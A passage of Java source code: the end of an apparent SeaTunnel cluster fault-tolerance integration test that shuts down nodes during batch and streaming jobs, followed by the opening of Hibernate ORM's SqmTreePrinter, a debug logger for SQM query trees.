TimeUnit.MILLISECONDS) .untilAsserted( () -> Assertions.assertEquals( 2, finalNode.getCluster().getMembers().size())); Common.setDeployMode(DeployMode.CLIENT); ImmutablePair<String, String> testResources = createTestResources( testCaseName, JobMode.STREAMING, testRowNumber, testParallelism, TEST_TEMPLATE_FILE_NAME); JobConfig jobConfig = new JobConfig(); jobConfig.setName(testCaseName); ClientConfig clientConfig = ConfigProvider.locateAndGetClientConfig(); clientConfig.setClusterName(TestUtils.getClusterName(testClusterName)); engineClient = new SeaTunnelClient(clientConfig); ClientJobExecutionEnvironment jobExecutionEnv = engineClient.createExecutionContext( testResources.getRight(), jobConfig, seaTunnelConfig); ClientJobProxy clientJobProxy = jobExecutionEnv.execute(); Awaitility.await() .atMost(300000, TimeUnit.MILLISECONDS) .pollInterval(2000, TimeUnit.MILLISECONDS) .untilAsserted( () -> { Long lineNumberFromDir = FileUtils.getFileLineNumberFromDir(testResources.getLeft()); log.warn( "\n================================={}=================================\n", lineNumberFromDir); Assertions.assertEquals( JobStatus.RUNNING, clientJobProxy.getJobStatus()); Assertions.assertTrue(lineNumberFromDir > 1); }); // In the restore case, ensure that JabStatus is in the RUNNING state before calling // waitForJobComplete. CompletableFuture<JobStatus> objectCompletableFuture = CompletableFuture.supplyAsync(() -> clientJobProxy.waitForJobComplete()); Thread.sleep(5000); // shutdown on worker node node2.shutdown(); Awaitility.await() .atMost(300000, TimeUnit.MILLISECONDS) .pollInterval(2000, TimeUnit.MILLISECONDS) .untilAsserted( () -> { Long lineNumberFromDir = FileUtils.getFileLineNumberFromDir(testResources.getLeft()); log.warn( "\n================================={}=================================\n", lineNumberFromDir); Assertions.assertEquals( JobStatus.RUNNING, clientJobProxy.getJobStatus()); Assertions.assertEquals( testRowNumber * testParallelism * 2, lineNumberFromDir); }); // sleep 10s and expect the job don't write more rows. Thread.sleep(10000); clientJobProxy.cancelJob(); Awaitility.await() .atMost(300000, TimeUnit.MILLISECONDS) .untilAsserted( () -> { Assertions.assertEquals( JobStatus.CANCELED, clientJobProxy.getJobStatus()); Assertions.assertTrue(objectCompletableFuture.isDone()); Assertions.assertEquals( JobStatus.CANCELED, objectCompletableFuture.get()); }); // check the final rows Long fileLineNumberFromDir = FileUtils.getFileLineNumberFromDir(testResources.getLeft()); Assertions.assertEquals(testRowNumber * testParallelism * 2, fileLineNumberFromDir); } finally { if (engineClient != null) { engineClient.close(); } if (node1 != null) { node1.shutdown(); } if (node2 != null) { node2.shutdown(); } } } @Test public void testTwoPipelineBatchJobRestoreIn2NodeMasterDown() throws Exception { String testCaseName = "testTwoPipelineBatchJobRestoreIn2NodeMasterDown" + System.currentTimeMillis(); String testClusterName = "ClusterFaultToleranceTwoPipelineIT_testTwoPipelineBatchJobRestoreIn2NodeMasterDown" + System.currentTimeMillis(); long testRowNumber = 1000; int testParallelism = 6; HazelcastInstanceImpl node1 = null; HazelcastInstanceImpl node2 = null; SeaTunnelClient engineClient = null; SeaTunnelConfig seaTunnelConfig = ConfigProvider.locateAndGetSeaTunnelConfig(); seaTunnelConfig .getHazelcastConfig() .setClusterName(TestUtils.getClusterName(testClusterName)); try { node1 = SeaTunnelServerStarter.createHazelcastInstance(seaTunnelConfig); node2 = SeaTunnelServerStarter.createHazelcastInstance(seaTunnelConfig); // waiting all node added to cluster HazelcastInstanceImpl finalNode = node1; Awaitility.await() .atMost(10000, TimeUnit.MILLISECONDS) .untilAsserted( () -> Assertions.assertEquals( 2, finalNode.getCluster().getMembers().size())); Common.setDeployMode(DeployMode.CLIENT); ImmutablePair<String, String> testResources = createTestResources( testCaseName, JobMode.BATCH, testRowNumber, testParallelism, TEST_TEMPLATE_FILE_NAME); JobConfig jobConfig = new JobConfig(); jobConfig.setName(testCaseName); ClientConfig clientConfig = ConfigProvider.locateAndGetClientConfig(); clientConfig.setClusterName(TestUtils.getClusterName(testClusterName)); engineClient = new SeaTunnelClient(clientConfig); ClientJobExecutionEnvironment jobExecutionEnv = engineClient.createExecutionContext( testResources.getRight(), jobConfig, seaTunnelConfig); ClientJobProxy clientJobProxy = jobExecutionEnv.execute(); Awaitility.await() .atMost(300000, TimeUnit.MILLISECONDS) .pollInterval(2000, TimeUnit.MILLISECONDS) .untilAsserted( () -> { Long lineNumberFromDir = FileUtils.getFileLineNumberFromDir(testResources.getLeft()); log.warn( "\n================================={}=================================\n", lineNumberFromDir); Assertions.assertEquals( JobStatus.RUNNING, clientJobProxy.getJobStatus()); Assertions.assertTrue(lineNumberFromDir > 1); }); // In the restore case, ensure that JabStatus is in the RUNNING state before calling // waitForJobComplete. CompletableFuture<JobStatus> objectCompletableFuture = CompletableFuture.supplyAsync(clientJobProxy::waitForJobComplete); // shutdown master node node1.shutdown(); log.info( "=============================shutdown node1==================================="); Awaitility.await() .atMost(300000, TimeUnit.MILLISECONDS) .pollInterval(2000, TimeUnit.MILLISECONDS) .untilAsserted( () -> { log.warn( "\n================================={}=================================\n", FileUtils.getFileLineNumberFromDir( testResources.getLeft())); Assertions.assertEquals( JobStatus.FINISHED, clientJobProxy.getJobStatus()); Assertions.assertTrue(objectCompletableFuture.isDone()); Assertions.assertEquals( JobStatus.FINISHED, objectCompletableFuture.get()); }); Long fileLineNumberFromDir = FileUtils.getFileLineNumberFromDir(testResources.getLeft()); Assertions.assertEquals(testRowNumber * testParallelism * 2, fileLineNumberFromDir); } finally { if (engineClient != null) { engineClient.close(); } if (node1 != null) { node1.shutdown(); } if (node2 != null) { node2.shutdown(); } } } @Test public void testTwoPipelineStreamJobRestoreIn2NodeMasterDown() throws Exception { String testCaseName = "testTwoPipelineStreamJobRestoreIn2NodeMasterDown" + System.currentTimeMillis(); String testClusterName = "ClusterFaultToleranceTwoPipelineIT_testTwoPipelineStreamJobRestoreIn2NodeMasterDown" + System.currentTimeMillis(); long testRowNumber = 1000; int testParallelism = 6; HazelcastInstanceImpl node1 = null; HazelcastInstanceImpl node2 = null; SeaTunnelClient engineClient = null; SeaTunnelConfig seaTunnelConfig = ConfigProvider.locateAndGetSeaTunnelConfig(); seaTunnelConfig .getHazelcastConfig() .setClusterName(TestUtils.getClusterName(testClusterName)); try { node1 = SeaTunnelServerStarter.createHazelcastInstance(seaTunnelConfig); node2 = SeaTunnelServerStarter.createHazelcastInstance(seaTunnelConfig); // waiting all node added to cluster HazelcastInstanceImpl finalNode = node1; Awaitility.await() .atMost(10000, TimeUnit.MILLISECONDS) .untilAsserted( () -> Assertions.assertEquals( 2, finalNode.getCluster().getMembers().size())); Common.setDeployMode(DeployMode.CLIENT); ImmutablePair<String, String> testResources = createTestResources( testCaseName, JobMode.STREAMING, testRowNumber, testParallelism, TEST_TEMPLATE_FILE_NAME); JobConfig jobConfig = new JobConfig(); jobConfig.setName(testCaseName); ClientConfig clientConfig = ConfigProvider.locateAndGetClientConfig(); clientConfig.setClusterName(TestUtils.getClusterName(testClusterName)); engineClient = new SeaTunnelClient(clientConfig); ClientJobExecutionEnvironment jobExecutionEnv = engineClient.createExecutionContext( testResources.getRight(), jobConfig, seaTunnelConfig); ClientJobProxy clientJobProxy = jobExecutionEnv.execute(); Awaitility.await() .atMost(360000, TimeUnit.MILLISECONDS) .pollInterval(2000, TimeUnit.MILLISECONDS) .untilAsserted( () -> { Long lineNumberFromDir = FileUtils.getFileLineNumberFromDir(testResources.getLeft()); log.warn( "\n================================={}=================================\n", lineNumberFromDir); Assertions.assertEquals( JobStatus.RUNNING, clientJobProxy.getJobStatus()); Assertions.assertTrue(lineNumberFromDir > 1); }); // In the restore case, ensure that JabStatus is in the RUNNING state before calling // waitForJobComplete. CompletableFuture<JobStatus> objectCompletableFuture = CompletableFuture.supplyAsync(clientJobProxy::waitForJobComplete); // shutdown master node node1.shutdown(); Awaitility.await() .atMost(300000, TimeUnit.MILLISECONDS) .pollInterval(2000, TimeUnit.MILLISECONDS) .untilAsserted( () -> { Long lineNumberFromDir = FileUtils.getFileLineNumberFromDir(testResources.getLeft()); log.warn( "\n================================={}=================================\n", lineNumberFromDir); Assertions.assertEquals( JobStatus.RUNNING, clientJobProxy.getJobStatus()); Assertions.assertEquals( testRowNumber * testParallelism * 2, lineNumberFromDir); }); // sleep 10s and expect the job don't write more rows. Thread.sleep(10000); clientJobProxy.cancelJob(); Awaitility.await() .atMost(350000, TimeUnit.MILLISECONDS) .pollInterval(2000, TimeUnit.MILLISECONDS) .untilAsserted( () -> { Assertions.assertEquals( JobStatus.CANCELED, clientJobProxy.getJobStatus()); Assertions.assertTrue(objectCompletableFuture.isDone()); Assertions.assertEquals( JobStatus.CANCELED, objectCompletableFuture.get()); }); // check the final rows Long fileLineNumberFromDir = FileUtils.getFileLineNumberFromDir(testResources.getLeft()); Assertions.assertEquals(testRowNumber * testParallelism * 2, fileLineNumberFromDir); } finally { if (engineClient != null) { engineClient.close(); } if (node1 != null) { node1.shutdown(); } if (node2 != null) { node2.shutdown(); } } } }
hibernate/hibernate-orm
33,297
hibernate-core/src/main/java/org/hibernate/query/sqm/internal/SqmTreePrinter.java
/* * SPDX-License-Identifier: Apache-2.0 * Copyright Red Hat Inc. and Hibernate Authors */ package org.hibernate.query.sqm.internal; import java.util.List; import java.util.Locale; import org.hibernate.query.sqm.DiscriminatorSqmPath; import org.hibernate.metamodel.model.domain.internal.AnyDiscriminatorSqmPath; import org.hibernate.query.QueryLogging; import org.hibernate.query.sqm.SemanticQueryWalker; import org.hibernate.query.sqm.tree.SqmStatement; import org.hibernate.query.sqm.tree.cte.SqmCteContainer; import org.hibernate.query.sqm.tree.cte.SqmCteStatement; import org.hibernate.query.sqm.tree.delete.SqmDeleteStatement; import org.hibernate.query.sqm.tree.domain.NonAggregatedCompositeSimplePath; import org.hibernate.query.sqm.tree.domain.SqmAnyValuedSimplePath; import org.hibernate.query.sqm.tree.domain.SqmBasicValuedSimplePath; import org.hibernate.query.sqm.tree.domain.SqmCorrelation; import org.hibernate.query.sqm.tree.domain.SqmCteRoot; import org.hibernate.query.sqm.tree.domain.SqmDerivedRoot; import org.hibernate.query.sqm.tree.domain.SqmEmbeddedValuedSimplePath; import org.hibernate.query.sqm.tree.domain.SqmEntityValuedSimplePath; import org.hibernate.query.sqm.tree.domain.SqmFkExpression; import org.hibernate.query.sqm.tree.domain.SqmFunctionPath; import org.hibernate.query.sqm.tree.domain.SqmFunctionRoot; import org.hibernate.query.sqm.tree.domain.SqmIndexedCollectionAccessPath; import org.hibernate.query.sqm.tree.domain.SqmMapEntryReference; import org.hibernate.query.sqm.tree.domain.SqmElementAggregateFunction; import org.hibernate.query.sqm.tree.domain.SqmIndexAggregateFunction; import org.hibernate.query.sqm.tree.domain.SqmPluralPartJoin; import org.hibernate.query.sqm.tree.domain.SqmPluralValuedSimplePath; import org.hibernate.query.sqm.tree.domain.SqmTreatedPath; import org.hibernate.query.sqm.tree.expression.AsWrapperSqmExpression; import org.hibernate.query.sqm.tree.expression.JpaCriteriaParameter; import org.hibernate.query.sqm.tree.expression.SqmAny; import org.hibernate.query.sqm.tree.expression.SqmAnyDiscriminatorValue; import org.hibernate.query.sqm.tree.expression.SqmBinaryArithmetic; import org.hibernate.query.sqm.tree.expression.SqmByUnit; import org.hibernate.query.sqm.tree.expression.SqmCaseSearched; import org.hibernate.query.sqm.tree.expression.SqmCaseSimple; import org.hibernate.query.sqm.tree.expression.SqmCastTarget; import org.hibernate.query.sqm.tree.expression.SqmCoalesce; import org.hibernate.query.sqm.tree.expression.SqmCollation; import org.hibernate.query.sqm.tree.expression.SqmCollectionSize; import org.hibernate.query.sqm.tree.expression.SqmDistinct; import org.hibernate.query.sqm.tree.expression.SqmDurationUnit; import org.hibernate.query.sqm.tree.expression.SqmEnumLiteral; import org.hibernate.query.sqm.tree.expression.SqmEvery; import org.hibernate.query.sqm.tree.expression.SqmExpression; import org.hibernate.query.sqm.tree.expression.SqmExtractUnit; import org.hibernate.query.sqm.tree.expression.SqmFieldLiteral; import org.hibernate.query.sqm.tree.expression.SqmFormat; import org.hibernate.query.sqm.tree.expression.SqmFunction; import org.hibernate.query.sqm.tree.expression.SqmHqlNumericLiteral; import org.hibernate.query.sqm.tree.expression.SqmLiteral; import org.hibernate.query.sqm.tree.expression.SqmLiteralEmbeddableType; import org.hibernate.query.sqm.tree.expression.SqmLiteralEntityType; import org.hibernate.query.sqm.tree.expression.SqmModifiedSubQueryExpression; import org.hibernate.query.sqm.tree.expression.SqmNamedExpression; import org.hibernate.query.sqm.tree.expression.SqmNamedParameter; import org.hibernate.query.sqm.tree.expression.SqmOver; import org.hibernate.query.sqm.tree.expression.SqmOverflow; import org.hibernate.query.sqm.tree.expression.SqmParameterizedEntityType; import org.hibernate.query.sqm.tree.expression.SqmPositionalParameter; import org.hibernate.query.sqm.tree.expression.SqmSetReturningFunction; import org.hibernate.query.sqm.tree.expression.SqmStar; import org.hibernate.query.sqm.tree.expression.SqmSummarization; import org.hibernate.query.sqm.tree.expression.SqmToDuration; import org.hibernate.query.sqm.tree.expression.SqmTrimSpecification; import org.hibernate.query.sqm.tree.expression.SqmTuple; import org.hibernate.query.sqm.tree.expression.SqmUnaryOperation; import org.hibernate.query.sqm.tree.expression.SqmWindow; import org.hibernate.query.sqm.tree.from.SqmAttributeJoin; import org.hibernate.query.sqm.tree.from.SqmCrossJoin; import org.hibernate.query.sqm.tree.from.SqmCteJoin; import org.hibernate.query.sqm.tree.from.SqmDerivedJoin; import org.hibernate.query.sqm.tree.from.SqmEntityJoin; import org.hibernate.query.sqm.tree.from.SqmFrom; import org.hibernate.query.sqm.tree.from.SqmFromClause; import org.hibernate.query.sqm.tree.from.SqmFunctionJoin; import org.hibernate.query.sqm.tree.from.SqmJoin; import org.hibernate.query.sqm.tree.from.SqmRoot; import org.hibernate.query.sqm.tree.insert.SqmConflictClause; import org.hibernate.query.sqm.tree.insert.SqmConflictUpdateAction; import org.hibernate.query.sqm.tree.insert.SqmInsertSelectStatement; import org.hibernate.query.sqm.tree.insert.SqmInsertValuesStatement; import org.hibernate.query.sqm.tree.insert.SqmValues; import org.hibernate.query.sqm.tree.predicate.SqmBetweenPredicate; import org.hibernate.query.sqm.tree.predicate.SqmBooleanExpressionPredicate; import org.hibernate.query.sqm.tree.predicate.SqmComparisonPredicate; import org.hibernate.query.sqm.tree.predicate.SqmEmptinessPredicate; import org.hibernate.query.sqm.tree.predicate.SqmExistsPredicate; import org.hibernate.query.sqm.tree.predicate.SqmGroupedPredicate; import org.hibernate.query.sqm.tree.predicate.SqmInListPredicate; import org.hibernate.query.sqm.tree.predicate.SqmInSubQueryPredicate; import org.hibernate.query.sqm.tree.predicate.SqmJunctionPredicate; import org.hibernate.query.sqm.tree.predicate.SqmLikePredicate; import org.hibernate.query.sqm.tree.predicate.SqmMemberOfPredicate; import org.hibernate.query.sqm.tree.predicate.SqmNegatedPredicate; import org.hibernate.query.sqm.tree.predicate.SqmNullnessPredicate; import org.hibernate.query.sqm.tree.predicate.SqmPredicate; import org.hibernate.query.sqm.tree.predicate.SqmTruthnessPredicate; import org.hibernate.query.sqm.tree.predicate.SqmWhereClause; import org.hibernate.query.sqm.tree.select.SqmDynamicInstantiation; import org.hibernate.query.sqm.tree.select.SqmJpaCompoundSelection; import org.hibernate.query.sqm.tree.select.SqmOrderByClause; import org.hibernate.query.sqm.tree.select.SqmQueryGroup; import org.hibernate.query.sqm.tree.select.SqmQueryPart; import org.hibernate.query.sqm.tree.select.SqmQuerySpec; import org.hibernate.query.sqm.tree.select.SqmSelectClause; import org.hibernate.query.sqm.tree.select.SqmSelectStatement; import org.hibernate.query.sqm.tree.select.SqmSelectableNode; import org.hibernate.query.sqm.tree.select.SqmSelection; import org.hibernate.query.sqm.tree.select.SqmSortSpecification; import org.hibernate.query.sqm.tree.select.SqmSubQuery; import org.hibernate.query.sqm.tree.update.SqmAssignment; import org.hibernate.query.sqm.tree.update.SqmSetClause; import org.hibernate.query.sqm.tree.update.SqmUpdateStatement; import org.jboss.logging.Logger; import jakarta.persistence.criteria.Predicate; /** * Printer for an SQM tree - for debugging purpose * * @implNote At the top-level (statement) we check against {@link #TRACE_ENABLED} * and decide whether to continue or not. That's to avoid unnecessary, continued * checking of that boolean. The assumption being that we only ever enter from * these statement rules * * @author Steve Ebersole */ public class SqmTreePrinter implements SemanticQueryWalker<Object> { private static final Logger LOG = Logger.getLogger( SqmTreePrinter.class ); private static final Logger LOGGER = QueryLogging.subLogger( "sqm.ast" ); private static final boolean TRACE_ENABLED = LOGGER.isTraceEnabled(); public static void logTree(SqmQuerySpec<?> sqmQuerySpec, String header) { if ( !TRACE_ENABLED ) { return; } final SqmTreePrinter treePrinter = new SqmTreePrinter(); treePrinter.visitQuerySpec( sqmQuerySpec ); final String title = header != null ? header : "SqmQuerySpec Tree"; LOGGER.tracef( "%s:%n%s", title, treePrinter.buffer.toString() ); } public static void logTree(SqmStatement<?> sqmStatement) { if ( !TRACE_ENABLED ) { return; } final SqmTreePrinter printer = new SqmTreePrinter(); if ( sqmStatement instanceof SqmSelectStatement<?> statement ) { printer.visitSelectStatement( statement ); } else if ( sqmStatement instanceof SqmDeleteStatement<?> statement ) { printer.visitDeleteStatement( statement ); } else if ( sqmStatement instanceof SqmUpdateStatement<?> statement ) { printer.visitUpdateStatement( statement ); } else if ( sqmStatement instanceof SqmInsertSelectStatement<?> statement ) { printer.visitInsertSelectStatement( statement ); } LOGGER.tracef( "SqmStatement Tree:%n%s", printer.buffer.toString() ); } private final StringBuffer buffer = new StringBuffer(); private int depth = 2; private void processStanza(String name, Runnable continuation) { processStanza( name, false, continuation ); } private void processStanza(String name, String description, Runnable continuation) { processStanza( name, description, false, continuation ); } private void processStanza(String name, boolean indentContinuation, Runnable continuation) { logWithIndentation( "-> [%s]", name ); depth++; try { if ( indentContinuation ) { depth++; } continuation.run(); } catch (Exception e) { LOG.debugf( e, "Error processing stanza {%s}", name ); } finally { if ( indentContinuation ) { depth--; } } depth--; logWithIndentation( "<- [%s]", name ); } private void processStanza( String name, String description, boolean indentContinuation, Runnable continuation) { final String stanzaLabel = description == null ? "[" + name + ']' : "[" + name + "] - " + description; logWithIndentation( "-> " + stanzaLabel ); depth++; try { if ( indentContinuation ) { depth++; } continuation.run(); } catch (Exception e) { LOG.debugf( e, "Error processing stanza {%s}", name ); } finally { if ( indentContinuation ) { depth--; } } depth--; logWithIndentation( "<- " + stanzaLabel ); } private void logWithIndentation(Object line) { pad( depth ); buffer.append( line ).append( System.lineSeparator() ); } private void pad(int depth) { for ( int i = 0; i < depth; i++ ) { buffer.append( " " ); } } private void logWithIndentation(String pattern, Object arg1) { logWithIndentation( String.format( pattern, arg1 ) ); } private void logWithIndentation(String pattern, Object arg1, Object arg2) { logWithIndentation( String.format( pattern, arg1, arg2 ) ); } private void logWithIndentation(String pattern, Object... args) { logWithIndentation( String.format( pattern, args ) ); } private void logIndented(String line) { depth++; logWithIndentation( line ); depth--; } private void logIndented(String pattern, Object arg) { depth++; logWithIndentation( String.format( Locale.ROOT, pattern, arg ) ); depth--; } private void logIndented(String pattern, Object arg1, Object arg2) { depth++; logWithIndentation( String.format( Locale.ROOT, pattern, arg1, arg2 ) ); depth--; } private void logIndented(String pattern, Object... args) { depth++; logWithIndentation( String.format( Locale.ROOT, pattern, args ) ); depth--; } // ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ // statements @Override public Object visitDeleteStatement(SqmDeleteStatement<?> statement) { if ( TRACE_ENABLED ) { processStanza( "delete", () -> { logWithIndentation( "[target = %s]", statement.getTarget().getNavigablePath() ); visitWhereClause( statement.getWhereClause() ); } ); } return null; } @Override public Object visitInsertSelectStatement(SqmInsertSelectStatement<?> statement) { if ( TRACE_ENABLED ) { processStanza( "insert", () -> { logWithIndentation( "[target = %s]", statement.getTarget().getNavigablePath() ); processStanza( "into", () -> statement.getInsertionTargetPaths().forEach( sqmPath -> sqmPath.accept( this ) ) ); statement.getSelectQueryPart().accept( this ); } ); } return null; } @Override public Object visitInsertValuesStatement(SqmInsertValuesStatement<?> statement) { if ( TRACE_ENABLED ) { processStanza( "insert", () -> { logWithIndentation( "[target = %s]", statement.getTarget().getNavigablePath() ); processStanza( "into", () -> statement.getInsertionTargetPaths().forEach( sqmPath -> sqmPath.accept( this ) ) ); if ( statement.getConflictClause() != null ) { processStanza( "on conflict", () -> statement.getConflictClause().accept( this ) ); } } ); } return null; } @Override public Object visitConflictClause(SqmConflictClause<?> sqmConflictClause) { if ( sqmConflictClause.getConstraintName() != null ) { logWithIndentation( "[constraintName = %s]", sqmConflictClause.getConstraintName() ); } else { processStanza( "constraint attributes", () -> sqmConflictClause.getConstraintPaths().forEach( sqmPath -> sqmPath.accept( this ) ) ); } final SqmConflictUpdateAction<?> updateAction = sqmConflictClause.getConflictAction(); if ( updateAction == null ) { logWithIndentation( "do nothing" ); } else { logWithIndentation( "do update " ); visitSetClause( updateAction.getSetClause() ); visitWhereClause( updateAction.getWhereClause() ); } return null; } @Override public Object visitSelectStatement(SqmSelectStatement<?> statement) { if ( TRACE_ENABLED ) { processStanza( "select", () -> statement.getQueryPart().accept( this ) ); } return null; } @Override public Object visitCteStatement(SqmCteStatement<?> sqmCteStatement) { if ( TRACE_ENABLED ) { logIndented( "cte" ); } return null; } @Override public Object visitCteContainer(SqmCteContainer consumer) { return null; } @Override public Object visitUpdateStatement(SqmUpdateStatement<?> statement) { if ( TRACE_ENABLED ) { processStanza( statement.isVersioned() ? "update versioned" : "update", () -> { logWithIndentation( "[target = %s]", statement.getTarget().getNavigablePath() ); visitSetClause( statement.getSetClause() ); visitWhereClause( statement.getWhereClause() ); } ); } return null; } @Override public Object visitSetClause(SqmSetClause setClause) { processStanza( "set", () -> setClause.getAssignments().forEach( this::visitAssignment ) ); return null; } @Override public Object visitAssignment(SqmAssignment<?> assignment) { processStanza( "assignment", () -> { logWithIndentation( "=" ); depth++; logWithIndentation( "[%s]", assignment.getTargetPath().getNavigablePath() ); assignment.getValue().accept( this ); depth--; } ); return null; } // ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ // query-spec @Override public Object visitQueryGroup(SqmQueryGroup<?> queryGroup) { processStanza( "query-group", () -> { for ( SqmQueryPart<?> queryPart : queryGroup.getQueryParts() ) { if ( queryPart instanceof SqmQuerySpec<?> ) { visitQuerySpec( (SqmQuerySpec<?>) queryPart ); } else { visitQueryGroup( (SqmQueryGroup<?>) queryPart ); } } } ); return null; } @Override public Object visitQuerySpec(SqmQuerySpec<?> querySpec) { processStanza( "query-spec", () -> { visitSelectClause( querySpec.getSelectClause() ); visitFromClause( querySpec.getFromClause() ); visitWhereClause( querySpec.getWhereClause() ); visitGroupByClause( querySpec.getGroupByClauseExpressions() ); visitHavingClause( querySpec.getHavingClausePredicate() ); visitOrderByClause( querySpec.getOrderByClause() ); visitOffsetExpression( querySpec.getOffsetExpression() ); visitFetchExpression( querySpec.getFetchExpression() ); } ); return null; } @Override public Object visitGroupByClause(List<SqmExpression<?>> groupByClauseExpressions) { if ( groupByClauseExpressions != null && !groupByClauseExpressions.isEmpty() ) { processStanza( "group-by", () -> groupByClauseExpressions.forEach( e -> e.accept( this ) ) ); } return null; } @Override public Object visitHavingClause(SqmPredicate predicate) { if ( predicate != null ) { processStanza( "having", () -> predicate.accept( this ) ); } return null; } @Override public Object visitJpaCompoundSelection(SqmJpaCompoundSelection<?> selection) { processStanza( "JpaCompoundSelection", () -> { for ( SqmSelectableNode<?> selectionItem : selection.getSelectionItems() ) { selectionItem.accept( this ); } } ); return null; } @Override public Object visitFromClause(SqmFromClause fromClause) { processStanza( "from", () -> fromClause.visitRoots( this::visitRootPath ) ); return null; } @Override public Object visitRootPath(SqmRoot<?> sqmRoot) { processStanza( "root", "'" + sqmRoot.getNavigablePath() + "'", () -> processJoins( sqmRoot ) ); return null; } @Override public Object visitRootDerived(SqmDerivedRoot<?> sqmRoot) { processStanza( "derived", "'" + sqmRoot.getNavigablePath() + "'", () -> processJoins( sqmRoot ) ); return null; } @Override public Object visitRootFunction(SqmFunctionRoot<?> sqmRoot) { processStanza( "derived", "'" + sqmRoot.getNavigablePath() + "'", () -> processJoins( sqmRoot ) ); return null; } @Override public Object visitRootCte(SqmCteRoot<?> sqmRoot) { processStanza( "cte", "'" + sqmRoot.getNavigablePath() + "'", () -> processJoins( sqmRoot ) ); return null; } private void processJoins(SqmFrom<?,?> sqmFrom) { if ( !sqmFrom.hasJoins() ) { return; } processStanza( "joins", () -> sqmFrom.visitSqmJoins( sqmJoin -> sqmJoin.accept( this ) ) ); } @Override public Object visitCrossJoin(SqmCrossJoin<?> joinedFromElement) { processStanza( "cross", "'" + joinedFromElement.getNavigablePath() + "'", () -> processJoins( joinedFromElement ) ); return null; } @Override public Object visitPluralPartJoin(SqmPluralPartJoin<?, ?> joinedFromElement) { processStanza( "plural-part", "'" + joinedFromElement.getNavigablePath() + "'", () -> processJoins( joinedFromElement ) ); return null; } private boolean inJoinPredicate; private void processJoinPredicate(SqmJoin<?, ?> joinedFromElement) { if ( joinedFromElement.getJoinPredicate() != null ) { boolean oldInJoinPredicate = inJoinPredicate; inJoinPredicate = true; processStanza( "on", () -> joinedFromElement.getJoinPredicate().accept( this ) ); inJoinPredicate = oldInJoinPredicate; } } @Override public Object visitQualifiedEntityJoin(SqmEntityJoin<?,?> joinedFromElement) { if ( inJoinPredicate ) { logWithIndentation( "-> [joined-path] - '%s'", joinedFromElement.getNavigablePath() ); } else { processStanza( "entity", "'" + joinedFromElement.getNavigablePath() + "'", () -> { processJoinPredicate( joinedFromElement ); processJoins( joinedFromElement ); } ); } return null; } @Override public Object visitQualifiedAttributeJoin(SqmAttributeJoin<?,?> joinedFromElement) { if ( inJoinPredicate ) { logWithIndentation( "-> [joined-path] - '%s'", joinedFromElement.getNavigablePath() ); } else { processStanza( "attribute", "'" + joinedFromElement.getNavigablePath() + "'", () -> { logIndented( "[fetched = " + joinedFromElement.isFetched() + ']' ); processJoinPredicate( joinedFromElement ); processJoins( joinedFromElement ); } ); } return null; } @Override public Object visitQualifiedDerivedJoin(SqmDerivedJoin<?> joinedFromElement) { if ( inJoinPredicate ) { logWithIndentation( "-> [joined-path] - '%s'", joinedFromElement.getNavigablePath() ); } else { processStanza( "derived", "'" + joinedFromElement.getNavigablePath() + "'", () -> { processJoinPredicate( joinedFromElement ); processJoins( joinedFromElement ); } ); } return null; } @Override public Object visitQualifiedFunctionJoin(SqmFunctionJoin<?> joinedFromElement) { if ( inJoinPredicate ) { logWithIndentation( "-> [joined-path] - '%s'", joinedFromElement.getNavigablePath() ); } else { processStanza( "derived", "'" + joinedFromElement.getNavigablePath() + "'", () -> { processJoinPredicate( joinedFromElement ); processJoins( joinedFromElement ); } ); } return null; } @Override public Object visitQualifiedCteJoin(SqmCteJoin<?> joinedFromElement) { if ( inJoinPredicate ) { logWithIndentation( "-> [joined-path] - '%s'", joinedFromElement.getNavigablePath() ); } else { processStanza( "cte", "'" + joinedFromElement.getNavigablePath() + "'", () -> { processJoinPredicate( joinedFromElement ); processJoins( joinedFromElement ); } ); } return null; } @Override public Object visitBasicValuedPath(SqmBasicValuedSimplePath<?> path) { logWithIndentation( "-> [basic-path] - '%s'", path.getNavigablePath() ); return null; } @Override public Object visitEmbeddableValuedPath(SqmEmbeddedValuedSimplePath<?> path) { logWithIndentation( "-> [embedded-path] - '%s'", path.getNavigablePath() ); return null; } @Override public Object visitAnyValuedValuedPath(SqmAnyValuedSimplePath<?> path) { logWithIndentation( "-> [any-path] - '%s'", path.getNavigablePath() ); return null; } @Override public Object visitNonAggregatedCompositeValuedPath(NonAggregatedCompositeSimplePath<?> path) { logWithIndentation( "-> [non-aggregated-composite-path] - '%s'", path.getNavigablePath() ); return null; } @Override public Object visitFkExpression(SqmFkExpression<?> fkExpression) { logWithIndentation( "-> [fk-ref] - '%s'", fkExpression.getLhs().getNavigablePath() ); return null; } @Override public Object visitDiscriminatorPath(DiscriminatorSqmPath<?> sqmPath) { logWithIndentation( "-> [discriminator-path] - '%s'", sqmPath.getNavigablePath() ); return null; } @Override public Object visitEntityValuedPath(SqmEntityValuedSimplePath<?> path) { logWithIndentation( "-> [entity-path] - '%s'", path.getNavigablePath() ); return null; } @Override public Object visitPluralValuedPath(SqmPluralValuedSimplePath<?> path) { logWithIndentation( "-> [plural-path] - '%s'", path.getNavigablePath() ); return null; } @Override public Object visitIndexedPluralAccessPath(SqmIndexedCollectionAccessPath<?> path) { return null; } @Override public Object visitTreatedPath(SqmTreatedPath<?,?> sqmTreatedPath) { return null; } @Override public Object visitCorrelation(SqmCorrelation<?, ?> correlation) { return null; } @Override public Object visitSelectClause(SqmSelectClause selectClause) { processStanza( selectClause.isDistinct() ? "select(distinct)" : "select", () -> selectClause.getSelections().forEach( this::visitSelection ) ); return null; } @Override public Object visitSelection(SqmSelection<?> selection) { processStanza( selection.getAlias() == null ? "selection" : "selection(" + selection.getAlias() + ")", () -> selection.getSelectableNode().accept( this ) ); return null; } @Override public Object visitValues(SqmValues values) { return null; } @Override public Object visitPositionalParameterExpression(SqmPositionalParameter<?> expression) { logWithIndentation( "?%s", expression.getPosition() ); return null; } @Override public Object visitNamedParameterExpression(SqmNamedParameter<?> expression) { logWithIndentation( ":%s", expression.getName() ); return null; } @Override public Object visitJpaCriteriaParameter(JpaCriteriaParameter<?> expression) { return null; } @Override public Object visitEntityTypeLiteralExpression(SqmLiteralEntityType<?> expression) { return null; } @Override public Object visitEmbeddableTypeLiteralExpression(SqmLiteralEmbeddableType<?> expression) { return null; } @Override public Object visitParameterizedEntityTypeExpression(SqmParameterizedEntityType<?> expression) { return null; } @Override 